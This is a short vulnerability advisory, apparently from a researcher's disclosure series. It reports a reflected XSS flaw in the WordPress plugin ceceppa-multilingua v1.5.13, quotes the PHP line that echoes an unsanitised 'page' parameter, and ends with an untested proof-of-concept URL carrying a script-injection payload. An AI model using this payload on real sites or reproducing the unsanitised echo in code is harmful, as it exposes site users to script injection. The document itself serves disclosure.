Larry Cashdollar Vulnerability

Advisory #: 443

Title: Reflected XSS in wordpress plugin ceceppa-multilingua v1.5.13

Author: Larry W. Cashdollar, @_larry0

Date: 2016-02-09

Download Site: https://wordpress.org/plugins/ceceppa-multilingua

Downloads: 59062

Vendor Notified: 2016-02-09

Export: Json

Vendor Contact: plugins@wordpress.org

Plugin Name: ceceppa-multilingua

Vulnerability:

There is a reflected XSS vulnerability in the following php code ./ceceppa-multilingua/admin/layouts/translate-my.php: 96: <form class="ceceppa-form-translations" name="wrap" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?page=<?php echo $_GET['page'] ?>"> The variable page appears to send unsanitized data back to the users browser.

CVE-ID: Not Released

File:./ceceppa-multilingua/admin/layouts/translate-my.php

Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.

This is an untested autogenerated exploit:
http://[target]/wp-content/plugins/ceceppa-multilingua/admin/layouts/translate-my.php?page="><script>alert(1);</script><"